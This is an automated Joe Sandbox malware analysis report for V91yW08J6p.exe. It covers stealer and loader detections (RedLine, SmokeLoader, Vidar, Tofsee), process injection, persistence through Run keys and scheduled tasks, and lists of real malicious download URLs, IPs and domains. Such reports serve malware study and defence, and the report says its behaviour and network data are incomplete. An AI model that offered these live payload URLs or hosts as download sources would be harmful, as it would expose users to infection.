                      Source: Yara matchFile source: 0000000B.00000002.840877989.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850501152.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.1062344530.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850539504.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.846397330.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6902.exe PID: 1716, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qxoxlxqh.exe PID: 5788, type: MEMORYSTR
                      Source: Yara matchFile source: 00000025.00000002.1069240289.00000000007B4000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.809805582.0000000000548000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1068850815.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.909618696.0000000002370000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: 13.2.768F.exe.391ba90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.768F.exe.37df910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.768F.exe.391ba90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.768F.exe.37df910.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001E.00000000.863779342.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.860675762.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.868605208.00000000036C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.863199052.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000003.915417310.00000000009D2000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.864291175.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.869195852.0000000003831000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.916450384.0000000000C18000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected SmokeLoader
                      Source: Yara matchFile source: 0.2.V91yW08J6p.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.adiicvb.6115a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.1.adiicvb.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.1.V91yW08J6p.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.V91yW08J6p.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.adiicvb.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.807939940.00000000005B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.737039163.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.738316434.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.788360446.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.907355017.0000000002090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.808518584.00000000021B1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.722834578.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.907548459.00000000020C1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.788330206.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match, file source: 00000021.00000002.1065071680.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000021.00000003.885517058.0000000004950000.00000004.00000001.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match, file source: 00000008.00000002.809805582.0000000000548000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, file source: 00000025.00000002.1068850815.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000025.00000003.909618696.0000000002370000.00000004.00000001.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match, file source: 11.2.6902.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 26.3.qxoxlxqh.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 11.2.6902.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 11.3.6902.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 26.2.qxoxlxqh.exe.db0000.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 26.2.qxoxlxqh.exe.db0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 26.2.qxoxlxqh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 26.2.qxoxlxqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 11.2.6902.exe.5e0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 26.2.qxoxlxqh.exe.d50e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0000000B.00000003.814707254.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000B.00000002.840468381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 0000001A.00000002.850016785.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000B.00000002.840877989.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000001A.00000002.850501152.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000001D.00000002.1062344530.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000001A.00000002.850539504.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000001A.00000003.846397330.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: 6902.exe PID: 1716, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: qxoxlxqh.exe PID: 5788, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\6902.exe, code function: 11_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname
Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe, code function: 26_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname

                      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Spearphishing Link 1 | Native API 541 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 211 | Input Capture 1 | System Time Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 15 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Valid Accounts 1 | Exploitation for Client Execution 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 11 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Encrypted Channel 22 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter 2 | Valid Accounts 1 | Valid Accounts 1 | Obfuscated Files or Information 3 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Service Execution 3 | Windows Service 4 | Access Token Manipulation 1 | Software Packing 33 | NTDS | System Information Discovery 327 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 5 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Windows Service 4 | Timestomp 1 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 36 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Process Injection 713 | DLL Side-Loading 1 | Cached Domain Credentials | Security Software Discovery 641 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion 1 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading 131 | Proc Filesystem | Virtualization/Sandbox Evasion 331 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Valid Accounts 1 | /etc/passwd and /etc/shadow | Application Window Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Access Token Manipulation 1 | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Virtualization/Sandbox Evasion 331 | Input Capture | System Network Configuration Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Process Injection 713 | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery
Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Hidden Files and Directories 1 | GUI Input Capture | Domain Groups | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | | | Defacement

                      Behavior Graph

Behavior Graph ID: 551101, Sample: V91yW08J6p.exe, Startdate: 11/01/2022, Architecture: WINDOWS, Score: 100

Process tree recovered from the graph (DNS/IP contacts, dropped files and signatures are listed under the node they are attached to):

V91yW08J6p.exe (started)
  Signatures: Contains functionality to inject code into remote processes; Injects a PE file into a foreign processes
  V91yW08J6p.exe (child process)
    Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration)
    explorer.exe (injected)
      DNS/IP: host-data-coin-11.com; 185.233.81.115 port 443 (SUPERSERVERSDATACENTERRU, Russian Federation); 23 other IPs or domains
      Dropped: C:\Users\user\AppData\Roaming\vsiicvb (PE32); C:\Users\user\AppData\Roaming\adiicvb (PE32); C:\Users\user\AppData\Local\Temp\FF1A.exe (PE32); 11 other files (9 malicious)
      Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
      6902.exe (started)
        Dropped: C:\Users\user\AppData\Local\...\qxoxlxqh.exe (PE32)
        Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Machine Learning detection for dropped file; 3 other signatures
        cmd.exe (started) -> conhost.exe; drops C:\Windows\SysWOW64\...\qxoxlxqh.exe (copy) (PE32)
        cmd.exe (started) -> conhost.exe
        sc.exe (started) -> conhost.exe
        3 other processes -> conhost.exe, conhost.exe
      76E7.exe (started)
        Signatures: Found evasive API chain (may stop execution after checking mutex); Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Found evasive API chain (may stop execution after checking computer name); 2 other signatures
      7CCD.exe (started)
        Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); 3 other signatures
      768F.exe (started)
        Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Injects a PE file into a foreign processes
        768F.exe (child process)
adiicvb (started)
  Signatures: Machine Learning detection for dropped file
  adiicvb (child process)
    Signatures: Creates a thread in another existing process (thread injection)
qxoxlxqh.exe (started)
  Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Writes to foreign memory regions; Allocates memory in foreign processes

Sample-level DNS/IP: 78.46.160.87 port 80 (HETZNER-ASDE, Germany); api.2ip.ua 77.123.139.190 port 443 (VOLIA-ASUA, Ukraine); 15 other IPs or domains
Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Antivirus detection for URL or domain; Antivirus detection for dropped file; 18 other signatures

                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
V91yW08J6p.exe | 47% | ReversingLabs | Win32.Trojan.CrypterX
V91yW08J6p.exe | 100% | Joe Sandbox ML |

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\E6AF.exe | 100% | Avira | TR/AD.StellarStealer.rfurr
C:\Users\user\AppData\Local\Temp\768F.exe | 100% | Avira | HEUR/AGEN.1211353
C:\Users\user\AppData\Local\Temp\FF1A.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\7CCD.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\76E7.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\1365.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\E6AF.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\6902.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\2D5.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\vsiicvb | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\2941.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\adiicvb | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\768F.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\768F.exe | 67% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

Source | Detection | Scanner | Label
26.3.qxoxlxqh.exe.d70000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
8.2.76E7.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
8.2.76E7.exe.20d0e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
13.0.768F.exe.2c0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
13.0.768F.exe.2c0000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
2.0.V91yW08J6p.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
13.2.768F.exe.2c0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
6.0.adiicvb.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
7.3.7CCD.exe.5b0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
7.2.7CCD.exe.480e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
23.0.768F.exe.360000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
11.3.6902.exe.600000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
2.0.V91yW08J6p.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
11.2.6902.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
23.0.768F.exe.360000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
8.3.76E7.exe.20f0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
2.0.V91yW08J6p.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.0.adiicvb.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
23.0.768F.exe.360000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
26.2.qxoxlxqh.exe.d50e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
13.0.768F.exe.2c0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
6.0.adiicvb.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
11.2.6902.exe.5e0e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
26.2.qxoxlxqh.exe.db0000.2.unpack | 100% | Avira | BDS/Backdoor.Gen
23.2.768F.exe.360000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
23.0.768F.exe.360000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
7.2.7CCD.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.V91yW08J6p.exe.5415a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.2.adiicvb.6115a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.1.adiicvb.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.1.V91yW08J6p.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
26.2.qxoxlxqh.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
13.0.768F.exe.2c0000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
2.2.V91yW08J6p.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.2.adiicvb.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
https://api.ip.sb/ip | 0% | URL Reputation | safe
http://unicupload.top/install5.exe | 100% | URL Reputation | phishing
http://185.163.204.24/ | 0% | Avira URL Cloud | safe
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | 100% | Avira URL Cloud | malware
http://data-host-coin-8.com/game.exe | 100% | Avira URL Cloud | malware
http://data-host-coin-8.com/files/9993_1641737702_2517.exe | 100% | Avira URL Cloud | malware
http://unic11m.top/install1.exe | 100% | Avira URL Cloud | malware
http://amogohuigotuli.at/ | 0% | URL Reputation | safe
http://78.46.160.87/mozglue.dll | 100% | Avira URL Cloud | malware
http://185.7.214.171:8080/6.php | 100% | URL Reputation | malware
http://host-data-coin-11.com/ | 0% | URL Reputation | safe
http://unicupload.top/install1.exe | 100% | Avira URL Cloud | malware
http://78.46.160.87/nss3.dll | 0% | Avira URL Cloud | safe
http://78.46.160.87/msvcp140.dll | 0% | Avira URL Cloud | safe
http://185.163.204.22/capibar | 0% | Avira URL Cloud | safe
http://78.46.160.87/565 | 100% | Avira URL Cloud | malware
http://185.163.204.24//l/f/YmurSn4BZ2GIX1a3-bIa/46e4c7a557d7fa442d5850cc1378fc753993ad31 | 0% | Avira URL Cloud | safe
http://78.46.160.87/freebl3.dll | 100% | Avira URL Cloud | malware
http://185.163.204.24//l/f/YmurSn4BZ2GIX1a3-bIa/f1f6008861078c1253fd20374ac2ce7ed5f44d80 | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
dl.uploadgram.me | 176.9.247.226 | true | false | | high
yandex.ru | 5.255.255.50 | true | false | | high
github.com | 140.82.121.3 | true | false | | high
patmushta.info | 8.209.79.15 | true | false | | high
raw.githubusercontent.com | 185.199.108.133 | true | false | | high
cdn.discordapp.com | 162.159.129.233 | true | false | | high
iplogger.org | 148.251.234.83 | true | false | | high
noc.social | 149.28.78.238 | true | false | | high
unicupload.top | 54.38.220.85 | true | false | | high
amogohuigotuli.at | 5.163.255.148 | true | false | | high
host-data-coin-11.com | 5.188.88.184 | true | false | | high
bit.ly | 67.199.248.11 | true | false | | high
microsoft-com.mail.protection.outlook.com | 104.47.54.36 | true | false | | high
api.2ip.ua | 77.123.139.190 | true | false | | high
goo.su | 172.67.139.105 | true | false | | high
transfer.sh | 144.76.136.153 | true | false | | high
a0620531.xsph.ru | 141.8.192.58 | true | false | | high
softwaresworld.net | 94.102.49.170 | true | false | | high
data-host-coin-8.com | 5.188.88.184 | true | false | | high
unic11m.top | 54.38.220.85 | true | false | | high
srtuiyhuali.at | unknown | unknown | false | | high
fufuiloirtu.com | unknown | unknown | false | | high
api.ip.sb | unknown | unknown | false | | high
privacytools-foryou-777.com | unknown | unknown | false | | high

                                                                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://a0620531.xsph.ru/htrrfwedsqw.exe | false | | high
http://unicupload.top/install5.exe | true | URL Reputation: phishing | unknown
http://185.163.204.24/ | false | Avira URL Cloud: safe | unknown
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | true | Avira URL Cloud: malware | unknown
http://a0620531.xsph.ru/RMR.exe | false | | high
http://data-host-coin-8.com/game.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/files/9993_1641737702_2517.exe | true | Avira URL Cloud: malware | unknown
http://unic11m.top/install1.exe | true | Avira URL Cloud: malware | unknown
http://amogohuigotuli.at/ | false | URL Reputation: safe | unknown
http://78.46.160.87/mozglue.dll | true | Avira URL Cloud: malware | unknown
http://185.7.214.171:8080/6.php | true | URL Reputation: malware | unknown
http://host-data-coin-11.com/ | false | URL Reputation: safe | unknown
http://unicupload.top/install1.exe | true | Avira URL Cloud: malware | unknown
http://78.46.160.87/nss3.dll | true | Avira URL Cloud: safe | unknown
http://78.46.160.87/msvcp140.dll | true | Avira URL Cloud: safe | unknown
http://185.163.204.22/capibar | false | Avira URL Cloud: safe | unknown
http://a0620531.xsph.ru/6.exe | false | | high
http://a0620531.xsph.ru/c_setup.exe | false | | high
http://78.46.160.87/565 | true | Avira URL Cloud: malware | unknown
http://185.163.204.24//l/f/YmurSn4BZ2GIX1a3-bIa/46e4c7a557d7fa442d5850cc1378fc753993ad31 | false | Avira URL Cloud: safe | unknown
http://78.46.160.87/freebl3.dll | true | Avira URL Cloud: malware | unknown
http://185.163.204.24//l/f/YmurSn4BZ2GIX1a3-bIa/f1f6008861078c1253fd20374ac2ce7ed5f44d80 | false | Avira URL Cloud: safe | unknown

                                                                              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ip.sb/ip | 768F.exe, 0000000D.00000002.868605208.00000000036C1000.00000004.00000001.sdmp; 768F.exe, 0000000D.00000002.869195852.0000000003831000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                                                                              Contacted IPs


                                                                              Public

IP | Domain | Country | ASN | ASN Name (as reported, with country code suffix) | Malicious
185.163.45.70 | unknown | Moldova Republic of | 39798 | MIVOCLOUDMD | false
188.166.28.199 | unknown | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true
172.67.139.105 | goo.su | United States | 13335 | CLOUDFLARENETUS | false
54.38.220.85 | unicupload.top | France | 16276 | OVHFR | false
104.47.54.36 | microsoft-com.mail.protection.outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
175.119.10.231 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | false
110.14.121.125 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | false
144.76.136.153 | transfer.sh | Germany | 24940 | HETZNER-ASDE | false
78.46.160.87 | unknown | Germany | 24940 | HETZNER-ASDE | true
185.7.214.171 | unknown | France | 42652 | DELUNETDE | true
162.159.129.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
185.186.142.166 | unknown | Russian Federation | 204490 | ASKONTELRU | true
67.199.248.11 | bit.ly | United States | 396982 | GOOGLE-PRIVATE-CLOUDUS | false
94.102.49.170 | softwaresworld.net | Netherlands | 202425 | INT-NETWORKSC | false
77.123.139.190 | api.2ip.ua | Ukraine | 25229 | VOLIA-ASUA | false
140.82.121.3 | github.com | United States | 36459 | GITHUBUS | false
86.107.197.138 | unknown | Romania | 39855 | MOD-EUNL | false
61.98.7.133 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | false
104.21.38.221 | unknown | United States | 13335 | CLOUDFLARENETUS | false
5.163.255.148 | amogohuigotuli.at | Saudi Arabia | 25019 | SAUDINETSTC-ASSA | false
149.28.78.238 | noc.social | United States | 20473 | AS-CHOOPAUS | false
185.233.81.115 | unknown | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | true
8.209.79.15 | patmushta.info | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
5.188.88.184 | host-data-coin-11.com | Russian Federation | 34665 | PINDC-ASRU | false
141.8.192.58 | a0620531.xsph.ru | Russian Federation | 35278 | SPRINTHOSTRU | false
185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
185.163.204.22 | unknown | Germany | 20771 | CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE | false
185.163.204.24 | unknown | Germany | 20771 | CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE | false

                                                                              Private

                                                                              IP
                                                                              192.168.2.1

                                                                              General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 551101
Start date: 11.01.2022
Start time: 20:42:02
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 52s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: V91yW08J6p.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 45
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.evad.winEXE@52/19@109/29
EGA Information:
• Successful, ratio: 90%
HDC Information:
• Successful, ratio: 32.8% (good quality ratio 26.9%)
• Quality average: 66.2%
• Quality standard deviation: 37.8%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• TCP Packets have been reduced to 100
• Excluded processes from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 51.11.168.232, 20.49.150.241, 131.253.33.200, 13.107.22.200, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 172.67.75.172, 104.26.13.31, 104.26.12.31
• Excluded domains from analysis (whitelisted): www.bing.com, dual-a-0001.dc-msedge.net, api.ip.sb.cdn.cloudflare.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, microsoft.com, arc.msn.com, settingsfd-geo.trafficmanager.net
• Execution Graph export aborted for target 768F.exe, PID 6952 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing behavior and disassembly information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: V91yW08J6p.exe

Read together, these warnings mean the behavior, network and dropped-file sections of this report are a truncated sample of a 17-minute run, not a complete record, so an indicator that is absent here is not evidence that it did not occur. One concrete effect: api.ip.sb.cdn.cloudflare.net was whitelisted, so the public-IP lookup whose URL appears in 768F.exe memory does not show up in the contacted-host data.

                                                                              Simulations

                                                                              Behavior and APIs

Time | Type | Description
20:43:46 | Task Scheduler | Run new task: Firefox Default Browser Agent F2CB121A05C12497 path: C:\Users\user\AppData\Roaming\adiicvb
20:44:06 | API Interceptor | 1x Sleep call for process: 76E7.exe modified
20:44:38 | Task Scheduler | Run new task: Firefox Default Browser Agent ECF4A541FD40CD6B path: C:\Users\user\AppData\Roaming\vsiicvb
20:44:47 | API Interceptor | 4x Sleep call for process: E6AF.exe modified
20:45:34 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
20:45:50 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_s.exe
20:46:09 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
